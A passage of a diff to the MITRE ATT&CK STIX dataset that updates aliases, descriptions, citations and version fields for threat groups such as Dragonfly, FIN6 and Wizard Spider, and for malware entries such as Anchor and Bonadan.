"http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/Dragonfly_Threat_Against_Western_Energy_Suppliers.pdf" + }, + { + "source_name": "Secureworks IRON LIBERTY July 2019", + "url": "https://www.secureworks.com/research/resurgent-iron-liberty-targeting-energy-sector", + "description": "Secureworks. (2019, July 24). Resurgent Iron Liberty Targeting Energy Sector. Retrieved August 12, 2020." }, { "source_name": "Symantec Dragonfly Sept 2017", @@ -215186,15 +239133,41 @@ "source_name": "Fortune Dragonfly 2.0 Sept 2017", "description": "Hackett, R. (2017, September 6). Hackers Have Penetrated Energy Grid, Symantec Warns. Retrieved June 6, 2018.", "url": "http://fortune.com/2017/09/06/hack-energy-grid-symantec/" + }, + { + "source_name": "Dragos DYMALLOY ", + "url": "https://www.dragos.com/threat/dymalloy/", + "description": "Dragos. (n.d.). DYMALLOY. Retrieved August 20, 2020." + }, + { + "source_name": "Secureworks MCMD July 2019", + "url": "https://www.secureworks.com/research/mcmd-malware-analysis", + "description": "Secureworks. (2019, July 24). MCMD Malware Analysis. Retrieved August 13, 2020." + }, + { + "source_name": "Secureworks Karagany July 2019", + "url": "https://www.secureworks.com/research/updated-karagany-malware-targets-energy-sector", + "description": "Secureworks. (2019, July 24). Updated Karagany Malware Targets Energy Sector. Retrieved August 12, 2020." } ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "description": "[Dragonfly](https://attack.mitre.org/groups/G0035) Dragonfly is a cyber espionage group that has been active since at least 2011. They initially targeted defense and aviation companies but shifted to focus on the energy sector in early 2013. They have also targeted companies related to industrial control systems. (Citation: Symantec Dragonfly)(Citation: Secureworks IRON LIBERTY July 2019)\n\nA similar group emerged in 2015 and was identified by Symantec as [Dragonfly 2.0](https://attack.mitre.org/groups/G0074). There is debate over the extent of the overlap between [Dragonfly](https://attack.mitre.org/groups/G0035) and [Dragonfly 2.0](https://attack.mitre.org/groups/G0074), but there is sufficient evidence to lead to these being tracked as two separate groups. (Citation: Symantec Dragonfly Sept 2017)(Citation: Fortune Dragonfly 2.0 Sept 2017)(Citation: Dragos DYMALLOY )", + "name": "Dragonfly", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "id": "intrusion-set--1c63d4ec-0a75-4daa-b1df-0d11af3d3cc1", + "type": "intrusion-set", "aliases": [ "Dragonfly", + "TG-4192", + "Crouching Yeti", + "IRON LIBERTY", "Energetic Bear" ], - "modified": "2019-03-22T20:11:04.628Z", + "modified": "2020-10-14T22:42:00.531Z", "created": "2017-05-31T21:32:05.217Z", - "x_mitre_version": "1.0" + "x_mitre_version": "2.0" }, { "external_references": [ @@ -215207,6 +239180,14 @@ "source_name": "Dragonfly 2.0", "description": "(Citation: US-CERT TA18-074A) (Citation: Symantec Dragonfly Sept 2017) (Citation: Fortune Dragonfly 2.0 Sept 2017)" }, + { + "source_name": "IRON LIBERTY", + "description": "(Citation: Secureworks MCMD July 2019)(Citation: Secureworks IRON LIBERTY)" + }, + { + "source_name": "DYMALLOY", + "description": "(Citation: Dragos DYMALLOY )" + }, { "source_name": "Berserk Bear", "description": "(Citation: Fortune Dragonfly 2.0 Sept 2017)" @@ -215225,23 +239206,40 @@ "source_name": "Fortune Dragonfly 2.0 Sept 2017", "description": "Hackett, R. (2017, September 6). Hackers Have Penetrated Energy Grid, Symantec Warns. Retrieved June 6, 2018.", "url": "http://fortune.com/2017/09/06/hack-energy-grid-symantec/" + }, + { + "source_name": "Dragos DYMALLOY ", + "url": "https://www.dragos.com/threat/dymalloy/", + "description": "Dragos. (n.d.). DYMALLOY. Retrieved August 20, 2020." + }, + { + "source_name": "Secureworks MCMD July 2019", + "url": "https://www.secureworks.com/research/mcmd-malware-analysis", + "description": "Secureworks. (2019, July 24). MCMD Malware Analysis. Retrieved August 13, 2020." + }, + { + "source_name": "Secureworks IRON LIBERTY", + "url": "https://www.secureworks.com/research/threat-profiles/iron-liberty", + "description": "Secureworks. (n.d.). IRON LIBERTY. Retrieved October 15, 2020." } ], "object_marking_refs": [ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" ], - "description": "[Dragonfly 2.0](https://attack.mitre.org/groups/G0074) is a suspected Russian group that has targeted government entities and multiple U.S. critical infrastructure sectors since at least March 2016. (Citation: US-CERT TA18-074A) (Citation: Symantec Dragonfly Sept 2017) There is debate over the extent of overlap between [Dragonfly 2.0](https://attack.mitre.org/groups/G0074) and [Dragonfly](https://attack.mitre.org/groups/G0035), but there is sufficient evidence to lead to these being tracked as two separate groups. (Citation: Fortune Dragonfly 2.0 Sept 2017)", + "description": "[Dragonfly 2.0](https://attack.mitre.org/groups/G0074) is a suspected Russian group that has targeted government entities and multiple U.S. critical infrastructure sectors since at least March 2016. (Citation: US-CERT TA18-074A) (Citation: Symantec Dragonfly Sept 2017) There is debate over the extent of overlap between [Dragonfly 2.0](https://attack.mitre.org/groups/G0074) and [Dragonfly](https://attack.mitre.org/groups/G0035), but there is sufficient evidence to lead to these being tracked as two separate groups. (Citation: Fortune Dragonfly 2.0 Sept 2017)(Citation: Dragos DYMALLOY )", "name": "Dragonfly 2.0", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "id": "intrusion-set--76d59913-1d24-4992-a8ac-05a3eb093f71", "type": "intrusion-set", "aliases": [ "Dragonfly 2.0", + "IRON LIBERTY", + "DYMALLOY", "Berserk Bear" ], - "modified": "2020-03-30T02:12:43.818Z", + "modified": "2020-10-15T20:14:58.980Z", "created": "2018-10-17T00:14:20.652Z", - "x_mitre_version": "1.2" + "x_mitre_version": "1.3" }, { "type": "intrusion-set", @@ -215505,6 +239503,14 @@ "source_name": "FIN6", "description": "(Citation: FireEye FIN6 April 2016)" }, + { + "source_name": "Magecart Group 6", + "description": "(Citation: Security Intelligence ITG08 April 2020)" + }, + { + "source_name": "SKELETON SPIDER", + "description": "(Citation: Crowdstrike Global Threat Report Feb 2018)" + }, { "source_name": "ITG08", "description": "(Citation: Security Intelligence More Eggs Aug 2019)" @@ -215519,6 +239525,16 @@ "url": "https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html", "source_name": "FireEye FIN6 Apr 2019" }, + { + "source_name": "Security Intelligence ITG08 April 2020", + "url": "https://securityintelligence.com/posts/itg08-aka-fin6-partners-with-trickbot-gang-uses-anchor-framework/", + "description": "Villadsen, O. (2020, April 7). ITG08 (aka FIN6) Partners With TrickBot Gang, Uses Anchor Framework. Retrieved October 8, 2020." + }, + { + "source_name": "Crowdstrike Global Threat Report Feb 2018", + "description": "CrowdStrike. (2018, February 26). CrowdStrike 2018 Global Threat Report. Retrieved October 10, 2018.", + "url": "https://crowdstrike.lookbookhq.com/global-threat-report-2018-web/cs-2018-global-threat-report" + }, { "description": "Villadsen, O.. (2019, August 29). More_eggs, Anyone? Threat Actor ITG08 Strikes Again. Retrieved September 16, 2019.", "url": "https://securityintelligence.com/posts/more_eggs-anyone-threat-actor-itg08-strikes-again/", @@ -215527,14 +239543,17 @@ ], "aliases": [ "FIN6", + "Magecart Group 6", + "SKELETON SPIDER", "ITG08" ], - "modified": "2020-05-15T19:15:35.233Z", + "modified": "2020-10-21T00:44:24.198Z", "created": "2017-05-31T21:32:06.015Z", "x_mitre_contributors": [ + "Center for Threat-Informed Defense (CTID)", "Drew Church, Splunk" ], - "x_mitre_version": "2.1" + "x_mitre_version": "3.0" }, { "type": "intrusion-set", @@ -215589,9 +239608,9 @@ "aliases": [ "FIN7" ], - "modified": "2020-06-24T19:07:46.524Z", + "modified": "2020-10-22T18:47:28.215Z", "created": "2017-05-31T21:32:09.460Z", - "x_mitre_version": "1.4" + "x_mitre_version": "1.5" }, { "external_references": [ @@ -215690,6 +239709,44 @@ "created": "2017-05-31T21:32:05.611Z", "x_mitre_version": "1.1" }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "external_references": [ + { + "external_id": "G0115", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0115" + }, + { + "source_name": "Secureworks REvil September 2019", + "url": "https://www.secureworks.com/research/revil-sodinokibi-ransomware", + "description": "Counter Threat Unit Research Team. (2019, September 24). REvil/Sodinokibi Ransomware. Retrieved August 4, 2020." + }, + { + "source_name": "Secureworks GandCrab and REvil September 2019", + "url": "https://www.secureworks.com/blog/revil-the-gandcrab-connection", + "description": "Secureworks . (2019, September 24). REvil: The GandCrab Connection. Retrieved August 4, 2020." + }, + { + "source_name": "Secureworks GOLD SOUTHFIELD", + "url": "https://www.secureworks.com/research/threat-profiles/gold-southfield", + "description": "Secureworks. (n.d.). GOLD SOUTHFIELD. Retrieved October 6, 2020." + } + ], + "name": "GOLD SOUTHFIELD", + "description": "[GOLD SOUTHFIELD](https://attack.mitre.org/groups/G0115) is a financially motivated threat group active since at least 2019 that operates the [REvil](https://attack.mitre.org/software/S0496) Ransomware-as-a Service (RaaS). [GOLD SOUTHFIELD](https://attack.mitre.org/groups/G0115) provides backend infrastructure for affiliates recruited on underground forums to perpetrate high value deployments.(Citation: Secureworks REvil September 2019)(Citation: Secureworks GandCrab and REvil September 2019)(Citation: Secureworks GOLD SOUTHFIELD)", + "type": "intrusion-set", + "id": "intrusion-set--c77c5576-ca19-42ed-a36f-4b4486a84133", + "aliases": [ + "GOLD SOUTHFIELD" + ], + "modified": "2020-10-06T15:32:20.089Z", + "created": "2020-09-22T19:41:27.845Z", + "x_mitre_version": "1.0" + }, { "id": "intrusion-set--2fd2be6a-d3a2-4a65-b499-05ea2693abee", "type": "intrusion-set", @@ -215760,12 +239817,13 @@ "aliases": [ "Gamaredon Group" ], - "modified": "2020-06-25T20:56:02.454Z", + "modified": "2020-08-31T15:10:22.189Z", "created": "2017-05-31T21:32:09.849Z", "x_mitre_contributors": [ + "ESET", "Trend Micro Incorporated" ], - "x_mitre_version": "1.1" + "x_mitre_version": "1.2" }, { "type": "intrusion-set", @@ -215851,7 +239909,7 @@ "object_marking_refs": [ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" ], - "description": "[Honeybee](https://attack.mitre.org/groups/G0072) is a campaign led by an unknown actor that targets humanitarian aid organizations and has been active in Vietnam, Singapore, Argentina, Japans, Indonesia, and Canada. It has been an active operation since August of 2017 and as recently as February 2018. (Citation: McAfee Honeybee)", + "description": "[Honeybee](https://attack.mitre.org/groups/G0072) is a campaign led by an unknown actor that targets humanitarian aid organizations and has been active in Vietnam, Singapore, Argentina, Japan, Indonesia, and Canada. It has been an active operation since August of 2017 and as recently as February 2018. (Citation: McAfee Honeybee)", "name": "Honeybee", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "id": "intrusion-set--ebb73863-fa44-4617-b4cb-b9ed3414eb87", @@ -215859,7 +239917,7 @@ "aliases": [ "Honeybee" ], - "modified": "2020-04-16T19:41:40.359Z", + "modified": "2020-07-23T19:48:35.981Z", "created": "2018-10-17T00:14:20.652Z", "x_mitre_version": "1.1" }, @@ -216120,9 +240178,9 @@ "ZINC", "NICKEL ACADEMY" ], - "modified": "2020-05-06T19:32:13.572Z", + "modified": "2020-10-02T16:21:21.624Z", "created": "2017-05-31T21:32:03.807Z", - "x_mitre_version": "1.3" + "x_mitre_version": "1.4" }, { "type": "intrusion-set", @@ -216294,10 +240352,10 @@ "created": "2017-05-31T21:32:07.928Z" }, { - "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", - "object_marking_refs": [ - "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" - ], + "id": "intrusion-set--38863958-a201-4ce1-9dbe-539b0b6804e0", + "type": "intrusion-set", + "name": "Machete", + "description": "[Machete](https://attack.mitre.org/groups/G0095) is a group that has been active since at least 2010, targeting high-profile government entities in Latin American countries.(Citation: Cylance Machete Mar 2017)(Citation: Securelist Machete Aug 2014)(Citation: ESET Machete July 2019)", "external_references": [ { "external_id": "G0095", @@ -216328,20 +240386,20 @@ "description": "ESET. (2019, July). MACHETE JUST GOT SHARPER Venezuelan government institutions under attack. Retrieved September 13, 2019." } ], - "description": "[Machete](https://attack.mitre.org/groups/G0095) is a group that has been active since at least 2010, targeting high-profile government entities in Latin American countries.(Citation: Cylance Machete Mar 2017)(Citation: Securelist Machete Aug 2014)(Citation: ESET Machete July 2019)", - "name": "Machete", - "type": "intrusion-set", - "id": "intrusion-set--38863958-a201-4ce1-9dbe-539b0b6804e0", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "aliases": [ "Machete", "El Machete" ], - "modified": "2020-03-28T21:28:33.395Z", + "modified": "2020-09-22T16:46:45.662Z", "created": "2019-09-13T12:37:10.394Z", - "x_mitre_version": "1.1", "x_mitre_contributors": [ "Matias Nicolas Porolli, ESET" - ] + ], + "x_mitre_version": "1.2" }, { "type": "intrusion-set", @@ -216555,13 +240613,6 @@ "x_mitre_version": "1.1" }, { - "created": "2018-04-18T17:59:24.739Z", - "modified": "2020-05-29T01:24:36.860Z", - "aliases": [ - "MuddyWater", - "Seedworm", - "TEMP.Zagros" - ], "type": "intrusion-set", "id": "intrusion-set--269e8108-68c6-4f99-b911-14b2e765dec2", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", @@ -216619,7 +240670,14 @@ "source_name": "FireEye MuddyWater Mar 2018" } ], - "x_mitre_version": "2.2" + "aliases": [ + "MuddyWater", + "Seedworm", + "TEMP.Zagros" + ], + "modified": "2020-07-29T21:27:47.641Z", + "created": "2018-04-18T17:59:24.739Z", + "x_mitre_version": "2.3" }, { "type": "intrusion-set", @@ -216733,9 +240791,9 @@ "aliases": [ "Night Dragon" ], - "modified": "2020-03-25T16:05:51.981Z", + "modified": "2020-10-15T00:54:00.656Z", "created": "2017-05-31T21:31:51.643Z", - "x_mitre_version": "1.2" + "x_mitre_version": "1.3" }, { "type": "intrusion-set", @@ -216815,13 +240873,13 @@ "HELIX KITTEN", "APT34" ], - "modified": "2020-07-04T23:23:07.383Z", + "modified": "2020-10-15T23:59:31.684Z", "created": "2017-12-14T16:46:06.044Z", "x_mitre_contributors": [ "Robert Falcone", "Bryan Lee" ], - "x_mitre_version": "1.3" + "x_mitre_version": "1.4" }, { "type": "intrusion-set", @@ -216898,7 +240956,7 @@ "id": "intrusion-set--efed95ba-d7e8-47ff-8c53-99c42426ee7c", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "name": "PROMETHIUM", - "description": "[PROMETHIUM](https://attack.mitre.org/groups/G0056) is an activity group that has been active since at least 2012. The group conducted a campaign in May 2016 and has heavily targeted Turkish victims. [PROMETHIUM](https://attack.mitre.org/groups/G0056) has demonstrated similarity to another activity group called [NEODYMIUM](https://attack.mitre.org/groups/G0055) due to overlapping victim and campaign characteristics. (Citation: Microsoft NEODYMIUM Dec 2016) (Citation: Microsoft SIR Vol 21)", + "description": "[PROMETHIUM](https://attack.mitre.org/groups/G0056) is an activity group focused on espionage that has been active since at least 2012. The group has conducted operations globally with a heavy emphasis on Turkish targets. [PROMETHIUM](https://attack.mitre.org/groups/G0056) has demonstrated similarity to another activity group called [NEODYMIUM](https://attack.mitre.org/groups/G0055) due to overlapping victim and campaign characteristics.(Citation: Microsoft NEODYMIUM Dec 2016)(Citation: Microsoft SIR Vol 21)(Citation: Talos Promethium June 2020)", "object_marking_refs": [ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" ], @@ -216912,6 +240970,10 @@ "source_name": "PROMETHIUM", "description": "(Citation: Microsoft NEODYMIUM Dec 2016) (Citation: Microsoft SIR Vol 21)" }, + { + "source_name": "StrongPity", + "description": "The name StrongPity has also been used to describe the group and the malware used by the group.(Citation: Bitdefender StrongPity June 2020)(Citation: Talos Promethium June 2020)" + }, { "url": "https://blogs.technet.microsoft.com/mmpc/2016/12/14/twin-zero-day-attacks-promethium-and-neodymium-target-individuals-in-europe/", "description": "Microsoft. (2016, December 14). Twin zero-day attacks: PROMETHIUM and NEODYMIUM target individuals in Europe. Retrieved November 27, 2017.", @@ -216921,14 +240983,25 @@ "source_name": "Microsoft SIR Vol 21", "description": "Anthe, C. et al. (2016, December 14). Microsoft Security Intelligence Report Volume 21. Retrieved November 27, 2017.", "url": "http://download.microsoft.com/download/E/B/0/EB0F50CC-989C-4B66-B7F6-68CD3DC90DE3/Microsoft_Security_Intelligence_Report_Volume_21_English.pdf" + }, + { + "source_name": "Talos Promethium June 2020", + "url": "https://blog.talosintelligence.com/2020/06/promethium-extends-with-strongpity3.html", + "description": "Mercer, W. et al. (2020, June 29). PROMETHIUM extends global reach with StrongPity3 APT. Retrieved July 20, 2020." + }, + { + "source_name": "Bitdefender StrongPity June 2020", + "url": "https://www.bitdefender.com/files/News/CaseStudies/study/353/Bitdefender-Whitepaper-StrongPity-APT.pdf", + "description": "Tudorica, R. et al. (2020, June 30). StrongPity APT - Revealing Trojanized Tools, Working Hours and Infrastructure. Retrieved July 20, 2020." } ], "aliases": [ - "PROMETHIUM" + "PROMETHIUM", + "StrongPity" ], - "modified": "2019-03-25T16:47:54.447Z", + "modified": "2020-10-22T18:12:48.893Z", "created": "2018-01-16T16:13:52.465Z", - "x_mitre_version": "1.0" + "x_mitre_version": "2.0" }, { "type": "intrusion-set", @@ -217023,9 +241096,9 @@ "MONSOON", "Operation Hangover" ], - "modified": "2020-07-03T22:15:24.309Z", + "modified": "2020-10-14T20:39:49.350Z", "created": "2017-05-31T21:32:07.145Z", - "x_mitre_version": "1.2" + "x_mitre_version": "1.3" }, { "type": "intrusion-set", @@ -217831,9 +241904,9 @@ "TEMP.Veles", "XENOTIME" ], - "modified": "2020-03-30T20:03:17.358Z", + "modified": "2020-10-04T23:31:36.937Z", "created": "2019-04-16T15:14:38.533Z", - "x_mitre_version": "1.1" + "x_mitre_version": "1.2" }, { "type": "intrusion-set", @@ -218122,7 +242195,7 @@ "id": "intrusion-set--7a19ecb1-3c65-4de3-a230-993516aed6a6", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "name": "Turla", - "description": "[Turla](https://attack.mitre.org/groups/G0010) is a Russian-based threat group that has infected victims in over 45 countries, spanning a range of industries including government, embassies, military, education, research and pharmaceutical companies since 2004. Heightened activity was seen in mid-2015. [Turla](https://attack.mitre.org/groups/G0010) is known for conducting watering hole and spearphishing campaigns and leveraging in-house tools and malware. [Turla](https://attack.mitre.org/groups/G0010)\u2019s espionage platform is mainly used against Windows machines, but has also been seen used against macOS and Linux machines. (Citation: Kaspersky Turla) (Citation: ESET Gazer Aug 2017) (Citation: CrowdStrike VENOMOUS BEAR) (Citation: ESET Turla Mosquito Jan 2018)", + "description": "[Turla](https://attack.mitre.org/groups/G0010) is a Russian-based threat group that has infected victims in over 45 countries, spanning a range of industries including government, embassies, military, education, research and pharmaceutical companies since 2004. Heightened activity was seen in mid-2015. [Turla](https://attack.mitre.org/groups/G0010) is known for conducting watering hole and spearphishing campaigns and leveraging in-house tools and malware. [Turla](https://attack.mitre.org/groups/G0010)\u2019s espionage platform is mainly used against Windows machines, but has also been seen used against macOS and Linux machines.(Citation: Kaspersky Turla)(Citation: ESET Gazer Aug 2017)(Citation: CrowdStrike VENOMOUS BEAR)(Citation: ESET Turla Mosquito Jan 2018)", "object_marking_refs": [ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" ], @@ -218200,13 +242273,13 @@ "Snake", "Krypton" ], - "modified": "2020-07-06T14:49:46.052Z", + "modified": "2020-10-22T20:25:26.398Z", "created": "2017-05-31T21:31:49.816Z", "x_mitre_contributors": [ "Matthieu Faou, ESET", "Edward Millington" ], - "x_mitre_version": "1.3" + "x_mitre_version": "1.4" }, { "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", @@ -218315,12 +242388,6 @@ "x_mitre_version": "1.0" }, { - "created": "2017-05-31T21:32:08.682Z", - "modified": "2020-05-04T22:15:08.418Z", - "aliases": [ - "Winnti Group", - "Blackfly" - ], "external_references": [ { "source_name": "mitre-attack", @@ -218369,22 +242436,28 @@ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "id": "intrusion-set--c5947e1c-1cbc-434c-94b8-27c7e3be0fff", "type": "intrusion-set", - "x_mitre_version": "1.0", + "aliases": [ + "Winnti Group", + "Blackfly" + ], + "modified": "2020-08-24T15:01:01.939Z", + "created": "2017-05-31T21:32:08.682Z", + "x_mitre_version": "1.1", "x_mitre_contributors": [ "Edward Millington" ] }, { - "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", - "object_marking_refs": [ - "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" - ], "external_references": [ { "external_id": "G0102", "source_name": "mitre-attack", "url": "https://attack.mitre.org/groups/G0102" }, + { + "source_name": "UNC1878", + "description": "(Citation: FireEye KEGTAP SINGLEMALT October 2020)" + }, { "source_name": "TEMP.MixMaster", "description": "(Citation: FireEye Ryuk and Trickbot January 2019)" @@ -218395,35 +242468,50 @@ }, { "source_name": "CrowdStrike Ryuk January 2019", - "url": "https://www.crowdstrike.com/blog/big-game-hunting-with-ryuk-another-lucrative-targeted-ransomware/", - "description": "Hanel, A. (2019, January 10). Big Game Hunting with Ryuk: Another Lucrative Targeted Ransomware. Retrieved May 12, 2020." + "description": "Hanel, A. (2019, January 10). Big Game Hunting with Ryuk: Another Lucrative Targeted Ransomware. Retrieved May 12, 2020.", + "url": "https://www.crowdstrike.com/blog/big-game-hunting-with-ryuk-another-lucrative-targeted-ransomware/" + }, + { + "source_name": "DHS/CISA Ransomware Targeting Healthcare October 2020", + "description": "DHS/CISA. (2020, October 28). Ransomware Activity Targeting the Healthcare and Public Health Sector. Retrieved October 28, 2020.", + "url": "https://us-cert.cisa.gov/ncas/alerts/aa20-302a" + }, + { + "source_name": "FireEye KEGTAP SINGLEMALT October 2020", + "description": "Kimberly Goody, Jeremy Kennelly, Joshua Shilko, Steve Elovitz, Douglas Bienstock. (2020, October 28). Unhappy Hour Special: KEGTAP and SINGLEMALT With a Ransomware Chaser. Retrieved October 28, 2020.", + "url": "https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html" }, { "source_name": "FireEye Ryuk and Trickbot January 2019", - "url": "https://www.fireeye.com/blog/threat-research/2019/01/a-nasty-trick-from-credential-theft-malware-to-business-disruption.html", - "description": "Goody, K., et al (2019, January 11). A Nasty Trick: From Credential Theft Malware to Business Disruption. Retrieved May 12, 2020." + "description": "Goody, K., et al (2019, January 11). A Nasty Trick: From Credential Theft Malware to Business Disruption. Retrieved May 12, 2020.", + "url": "https://www.fireeye.com/blog/threat-research/2019/01/a-nasty-trick-from-credential-theft-malware-to-business-disruption.html" }, { "source_name": "CrowdStrike Grim Spider May 2019", - "url": "https://www.crowdstrike.com/blog/timelining-grim-spiders-big-game-hunting-tactics/", - "description": "John, E. and Carvey, H. (2019, May 30). Unraveling the Spiderweb: Timelining ATT&CK Artifacts Used by GRIM SPIDER. Retrieved May 12, 2020." + "description": "John, E. and Carvey, H. (2019, May 30). Unraveling the Spiderweb: Timelining ATT&CK Artifacts Used by GRIM SPIDER. Retrieved May 12, 2020.", + "url": "https://www.crowdstrike.com/blog/timelining-grim-spiders-big-game-hunting-tactics/" } ], - "description": "[Wizard Spider](https://attack.mitre.org/groups/G0102) is financially motivated group that has been conducting ransomware campaigns since at least August 2018, primarily targeting large organizations. (Citation: CrowdStrike Ryuk January 2019)", - "name": "Wizard Spider", - "type": "intrusion-set", "id": "intrusion-set--dd2d9ca6-505b-4860-a604-233685b802c7", + "x_mitre_version": "1.2", + "x_mitre_contributors": [ + "Oleksiy Gayda" + ], + "description": "[Wizard Spider](https://attack.mitre.org/groups/G0102) is a financially motivated criminal group that has been conducting ransomware campaigns since at least August 2018 against a variety of organizations, ranging from major corporations to hospitals.(Citation: CrowdStrike Ryuk January 2019)(Citation: DHS/CISA Ransomware Targeting Healthcare October 2020)", + "name": "Wizard Spider", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], "aliases": [ "Wizard Spider", + "UNC1878", "TEMP.MixMaster", "Grim Spider" ], - "modified": "2020-06-16T17:30:19.543Z", + "type": "intrusion-set", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "created": "2020-05-12T18:15:29.396Z", - "x_mitre_version": "1.0", - "x_mitre_contributors": [ - "Oleksiy Gayda" - ] + "modified": "2020-11-10T19:06:49.687Z" }, { "type": "intrusion-set", @@ -218515,14 +242603,14 @@ "url": "https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-poison-ivy.pdf" }, { - "url": "https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-report-final-v4.pdf", + "source_name": "PWC Cloud Hopper April 2017", "description": "PwC and BAE Systems. (2017, April). Operation Cloud Hopper. Retrieved April 5, 2017.", - "source_name": "PWC Cloud Hopper April 2017" + "url": "https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-report-final-v4.pdf" }, { - "source_name": "FireEye APT10 April 2017", + "url": "https://www.fireeye.com/blog/threat-research/2017/04/apt10_menupass_grou.html", "description": "FireEye iSIGHT Intelligence. (2017, April 6). APT10 (MenuPass Group): New Tools, Global Campaign Latest Manifestation of Longstanding Threat. Retrieved June 29, 2017.", - "url": "https://www.fireeye.com/blog/threat-research/2017/04/apt10_menupass_grou.html" + "source_name": "FireEye APT10 April 2017" }, { "source_name": "DOJ APT10 Dec 2018", @@ -218548,13 +242636,13 @@ "CVNX", "HOGFISH" ], - "modified": "2020-03-30T02:32:34.960Z", + "modified": "2020-08-13T17:15:14.339Z", "created": "2017-05-31T21:32:09.054Z", "x_mitre_contributors": [ "Edward Millington", "Michael Cox" ], - "x_mitre_version": "1.4" + "x_mitre_version": "1.5" }, { "object_marking_refs": [ @@ -218828,6 +242916,54 @@ ], "x_mitre_version": "1.1" }, + { + "id": "malware--5f1d4579-4e8f-48e7-860e-2da773ae432e", + "name": "Anchor", + "description": "[Anchor](https://attack.mitre.org/software/S0504) is one of a family of backdoor malware that has been used in conjunction with [TrickBot](https://attack.mitre.org/software/S0266) on selected high profile targets since at least 2018.(Citation: Cyberreason Anchor December 2019)(Citation: Medium Anchor DNS July 2020)", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "external_references": [ + { + "external_id": "S0504", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0504" + }, + { + "source_name": "Anchor_DNS", + "description": "(Citation: Cyberreason Anchor December 2019)(Citation: Medium Anchor DNS July 2020)" + }, + { + "source_name": "Cyberreason Anchor December 2019", + "url": "https://www.cybereason.com/blog/dropping-anchor-from-a-trickbot-infection-to-the-discovery-of-the-anchor-malware", + "description": "Dahan, A. et al. (2019, December 11). DROPPING ANCHOR: FROM A TRICKBOT INFECTION TO THE DISCOVERY OF THE ANCHOR MALWARE. Retrieved September 10, 2020." + }, + { + "source_name": "Medium Anchor DNS July 2020", + "url": "https://medium.com/stage-2-security/anchor-dns-malware-family-goes-cross-platform-d807ba13ca30", + "description": "Grange, W. (2020, July 13). Anchor_dns malware goes cross platform. Retrieved September 10, 2020." + } + ], + "type": "malware", + "labels": [ + "malware" + ], + "modified": "2020-10-05T17:54:53.991Z", + "created": "2020-09-10T15:54:21.805Z", + "x_mitre_platforms": [ + "Linux", + "Windows" + ], + "x_mitre_aliases": [ + "Anchor", + "Anchor_DNS" + ], + "x_mitre_version": "1.0", + "x_mitre_contributors": [ + "Cybereason Nocturnus, @nocturnus" + ] + }, { "external_references": [ { @@ -219205,7 +243341,7 @@ "labels": [ "malware" ], - "modified": "2020-03-30T02:25:10.616Z", + "modified": "2020-10-21T18:22:52.183Z", "created": "2017-05-31T21:33:14.118Z", "x_mitre_platforms": [ "Windows" @@ -219213,7 +243349,7 @@ "x_mitre_aliases": [ "BADNEWS" ], - "x_mitre_version": "1.1" + "x_mitre_version": "1.2" }, { "external_references": [ @@ -219863,6 +243999,40 @@ ], "x_mitre_version": "1.2" }, + { + "id": "malware--4c6d62c2-89f5-4159-8fab-0190b1f9d328", + "name": "Bonadan", + "description": "[Bonadan](https://attack.mitre.org/software/S0486) is a malicious version of OpenSSH which acts as a custom backdoor. [Bonadan](https://attack.mitre.org/software/S0486) has been active since at least 2018 and combines a new cryptocurrency-mining module with the same credential-stealing module used by the Onderon family of backdoors.(Citation: ESET ForSSHe December 2018)", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "external_references": [ + { + "external_id": "S0486", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0486" + }, + { + "source_name": "ESET ForSSHe December 2018", + "url": "https://www.welivesecurity.com/wp-content/uploads/2018/12/ESET-The_Dark_Side_of_the_ForSSHe.pdf", + "description": "Dumont, R., M.L\u00e9veill\u00e9, M., Porcher, H. (2018, December 1). THE DARK SIDE OF THE FORSSHE A landscape of OpenSSH backdoors. Retrieved July 16, 2020." + } + ], + "type": "malware", + "labels": [ + "malware" + ], + "modified": "2020-08-10T19:17:14.766Z", + "created": "2020-07-16T14:59:40.051Z", + "x_mitre_aliases": [ + "Bonadan" + ], + "x_mitre_version": "1.0", + 